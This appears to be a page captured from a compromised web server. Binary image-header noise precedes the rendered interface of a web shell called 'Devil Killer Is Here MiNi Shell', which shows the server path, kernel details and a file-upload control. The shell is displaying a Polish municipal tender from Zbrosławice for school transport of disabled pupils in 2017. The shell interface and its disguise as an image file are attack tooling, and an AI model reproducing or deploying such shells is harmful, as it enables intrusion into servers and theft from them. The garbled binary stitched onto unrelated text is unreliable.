JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161202/357598-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.zbroslawice.pl' target='_blank'>http://www.bip.zbroslawice.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 357598 - 2016
              z dnia 2016-12-02 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Zbrosławice: Dowóz uczniów niepełnosprawnych z terenu Gminy Zbrosławice  wraz z opiekunami do szkół i przedszkoli (placówek) w 2017 r.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Zbrosławice, krajowy numer identyfikacyjny
              27625838000000, ul.
              ul. Oświęcimska 
              2,
              42674  
              Zbrosławice, woj.
              śląskie, państwo
              Polska, tel.
              032 2337012, e-mail
              urzad@zbroslawice.pl, faks
              032 2337100.
              <br />
              Adres strony internetowej (URL): www.zbroslawice.pl, www.bip.zbroslawice.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.zbroslawice.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy składać w Urzędzie Gminy Zbrosławice przy ul. Oświęcimskiej 2, piętro 1 w pokoju nr 7  - Kancelaria.<br />
                Adres:
                <br />Urząd Gminy Zbrosławice, ul.Oświęcimska 2, 42-674 Zbrosławice</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dowóz uczniów niepełnosprawnych z terenu Gminy Zbrosławice  wraz z opiekunami do szkół i przedszkoli (placówek) w 2017 r.<br /><b>Numer referencyjny: </b>PZP.271.10.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest wykonanie usługi polegającej na dowozie i odwozie uczniów niepełnosprawnych zamieszkałych na terenie Gminy Zbrosławice wraz z zapewnieniem  opiekunów, do szkół i przedszkoli (placówek), na trasie od miejsca zamieszkania uczniów do szkół i przedszkoli (placówek) i z powrotem: 
- w dni nauki szkolnej w 2017 r. zgodnie z Rozporządzeniem MENiS z dnia 18 kwietnia 2002r. w sprawie organizacji roku szkolnego  (Dz. U. Nr 46, poz. 432 z późn. zm.)  dotyczy szkół, 
- w dni robocze w 2017 r., za wyjątkiem sobót, niedziel, świat i przerwy wakacyjnej w lipcu i sierpniu 2017 r.  dotyczy przedszkoli.
Zamówienia zostało podzielone na części i obejmuje:
Część nr 1  Trasy nr 1, 2 i 3. 
Szczegółowy opis przedmiotu zamówienia dla części nr 1 stanowi załącznik 1A do SIWZ.
Część nr 2  Trasy nr 4 i 5
Szczegółowy opis przedmiotu zamówienia dla części nr 1 stanowi załącznik 1B do SIWZ.

Obowiązek zatrudnienia na podstawie umowy o pracę
Zamawiający wymaga, aby Wykonawca lub Podwykonawca przez cały okres wykonywania przedmiotu umowy zatrudniał na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy (Dz.U. z 2016 poz.1666 z późn. zm.) wszystkich pracowników, którzy będą świadczyli pracę związaną z wykonywaniem następujących czynności w trakcie realizacji niniejszego zamówienia, z wyłączeniem kadry kierowniczej: 
sprawowanie funkcji kierowców oraz opiekunów w czasie wykonywania dowozów i odwozów uczniów niepełnosprawnych zamieszkałych na terenie Gminy Zbrosławice do szkół i przedszkoli (placówek), na trasie od miejsca zamieszkania uczniów do szkół i przedszkoli (placówek) i z powrotem.

Powyższy warunek zostanie spełniony poprzez zatrudnienie na umowę o pracę nowych pracowników lub wyznaczenie do realizacji zamówienia zatrudnionych już u Wykonawcy pracowników. 
Realizacja zamówienia przez te osoby ma na celu podniesienie jakości i  punktualność wykonania zamówienia. Personel zatrudniony na podstawie stosunku pracy to większa dyspozycyjność osób wykonujących zamówienie wobec Zamawiającego i Wykonawcy, większe doświadczenie personelu [wynikające ze stałości zatrudnienia u danego wykonawcy], lepsza kontrola wykonania zamówienia z uwagi na podporządkowanie pracowników wynikające ze stosunku pracy większe zaangażowanie pracowników [wynikające z potrzeby należytego wywiązania się z obowiązków pracowniczych, co przekłada się na utrzymanie zatrudnienia].

UWAGI:
W celu weryfikacji realizacji ww. zobowiązania, Wykonawca będzie zobowiązany do raportowania stanu zatrudnienia przez cały okres realizacji zamówienia (danej jego części) na każde żądanie Zamawiającego, w terminie do 5 dni i w formie przez Zamawiającego określonej, Wykonawca będzie zobowiązany udzielić wyjaśnień w powyższym zakresie. W przypadku rażąco nienależytego wykonania ww. obowiązku, Zamawiający uprawniony będzie do odstąpienia od umowy w terminie 
14 dni od powiadomienia Wykonawcy o stwierdzonej niezgodności co do stanu zatrudnienia przy realizacji zamówienia 
i wezwania do niezwłocznego przywrócenia stanu zgodnego z ofertą.

<br /><br /><b>II.5) Główny kod CPV: </b>60130000-8<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 02/01/2017
                    data zakończenia: 29/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Dla części nr 1 i nr 2 zamówienia Zamawiający wyznacza następujące terminy wykonania przedmiotu zamówienia:
a) w dni nauki szkolnej w 2017 r. zgodnie z Rozporządzeniem MENiS z dnia 18 kwietnia 2002r. w sprawie organizacji roku szkolnego  (Dz. U. Nr 46, poz. 432 z późn. zm.)  dotyczy szkół,
b) w dni robocze w 2017 r., za wyjątkiem sobót, niedziel, świat i przerwy wakacyjnej w lipcu i sierpniu 2017 r.  dotyczy przedszkoli</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca musi posiadać uprawnienia do wykonywania działalności polegającej na krajowym transporcie drogowym osób lub krajowym transporcie drogowym w zakresie przewozu osób taksówką, w tym: 
a) licencję na wykonywanie krajowego transportu drogowego osób albo zezwolenie na wykonywanie zawodu przewoźnika drogowego lub
b) licencję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób taksówką.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                - dla części nr 1 zamówienia:
Za minimalny poziom zdolności uznane zostanie, wykazanie przez Wykonawcę, że jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż  250.000,00 zł, lub dla walut obcych na kwotę w wysokości równoważnej liczonej według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym zamieszczone zostało ogłoszenie o niniejszym zamówieniu w Biuletynie Zamówień Publicznych. 
- dla części nr 2 zamówienia:Za minimalny poziom zdolności uznane zostanie, wykazanie przez Wykonawcę, że jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż  80.000,00 zł, lub dla walut obcych na kwotę w wysokości równoważnej liczonej według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym zamieszczone zostało ogłoszenie o niniejszym zamówieniu w Biuletynie Zamówień Publicznych
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Za minimalny poziom zdolności uznane zostanie, wykazanie przez Wykonawcę, że: nie wcześniej niż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie: 
- dla Części nr 1 : co najmniej 2 usługi, polegające na transporcie osób niepełnosprawnych o wartości 120.000,00 zł brutto każda
- dla Części nr 2: co najmniej 2 usługi, polegające na transporcie osób niepełnosprawnych o wartości 40.000,00 zł brutto każda
Dla celów potwierdzenia spełnienia ww. warunku wykonawca zobowiązany jest podać wyłącznie wartość należycie zrealizowanych [zakończonych] usług przed upływem terminu składania ofert.  W przypadku nadal wykonywanych/realizowanych usług należy podać wartość wyłącznie tych usług, które zostały zakończone.
UWAGI: 
1.Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym ogłoszenie 
o niniejszym postępowaniu zostało zamieszczone w Biuletynie Zamówień Publicznych.
2.W przypadku, gdy Wykonawca polega na zasobach innych podmiotów przy wykazaniu spełniania warunku doświadczenia, zobowiązany jest wykazać, że podmioty te zrealizują usługi do realizacji których te zdolności są wymagane.

Za minimalny poziom zdolności uznane zostanie, wykazanie przez Wykonawcę, że:
dysponuje lub będzie dysponować co najmniej osobami zdolnymi do wykonania zamówienia tj.:
-  dla Części nr 1: co najmniej 3 kierowcami, spełniającymi wymagania określone w art. 39 a Ustawy z dnia 6 września 2001 r. o transporcie drogowym (t .j.  Dz. U. z 2013r. poz. 1414 z późn. zm.), oraz co najmniej 3 opiekunami, będącymi osobami pełnoletnimi i posiadającymi minimalny 1- roczny staż pracy na stanowisku pedagogicznym lub jako opiekun uczniów w trakcie przewozu uczniów niepełnosprawnych
- dla Części nr 2: co najmniej 1 kierowcą, spełniającym wymagania określone w art. 39 a Ustawy z dnia 6 września 2001 r.             o transporcie drogowym (t .j. Dz. U. z 2013r. poz. 1414 z późn. zm.), oraz co najmniej 1 opiekunem będącym osobą pełnoletnią i posiadającym minimalny 1 - roczny staż pracy na stanowisku pedagogicznym lub  jako opiekun uczniów w trakcie przewozu uczniów niepełnosprawnych

UWAGI
W przypadku składania oferty na więcej niż jedną część, należy wykazać dysponowanie kierowcami   i opiekunami spełniającymi wymagania j/w, w ilości odpowiadającej sumie dla poszczególnych części.

Za minimalny poziom zdolności uznane zostanie, wykazanie przez Wykonawcę, że:dysponuje lub będzie dysponować odpowiednim potencjałem technicznym w celu realizacji zamówienia tj. 
- dla Części nr 1: minimum 3 pojazdy posiadające ważne badania techniczne, dopuszczone do ruchu, nie starsze niż 10 lat od daty produkcji i odpowiednio oznakowane, w tym:
- trasa nr 1 - 1 pojazd z liczbą miejsc siedzących dla minimum 18 osób (łącznie z kierowcą), wszystkie siedzenia winny być wyposażone w bezwładnościowe  pasy bezpieczeństwa,
- trasa nr 2 - 1 pojazd z liczbą miejsc siedzących dla minimum 15 osób (łącznie
z kierowcą); wszystkie siedzenia winny być wyposażone w bezwładnościowe    pasy bezpieczeństwa,
- trasa nr 3 - 1 pojazd z liczbą miejsc siedzących dla minimum 5 osób (łącznie z kierowcą); wszystkie siedzenia winny być wyposażone w bezwładnościowe  pasy bezpieczeństwa,
- dla Części nr 2: minimum 1 pojazd posiadający ważne badania techniczne dopuszczony do ruchu, nie starszy niż 10 lat od daty produkcji i odpowiednio oznakowany, w tym:
- trasa nr 4 i 5 - 1 pojazd z liczbą miejsc siedzących dla minimum 5 osób (łącznie z kierowcą); wszystkie siedzenia winny być wyposażone w bezwładnościowe pasy bezpieczeństwa.
UWAGI 
W przypadku składania oferty na więcej niż jedną część, należy wykazać dysponowanie środkami transportu spełniającymi wymagania j/w, w ilości odpowiadającej sumie dla poszczególnych części.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Zamawiający żąda:
- zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
- zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
- odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zamawiający żąda:
- uprawnień do wykonywania działalności polegającej na krajowym transporcie drogowym osób lub krajowym transporcie drogowym w zakresie przewozu osób taksówką, w tym:
a) licencję na wykonywanie krajowego transportu drogowego osób albo zezwolenie na wykonywanie zawodu przewoźnika drogowego lub
b) licencję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób taksówką,
- wykazu usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy  wzór wykazu stanowi załącznik nr 5 do SIWZ.
- wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami  wzór wykazu stanowi załącznik nr 6 do SIWZ.
- wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami wzór wykazu stanowi załącznik nr 7  do SIWZ.
- dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego w pkt 5.2.2. SIWZ.

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
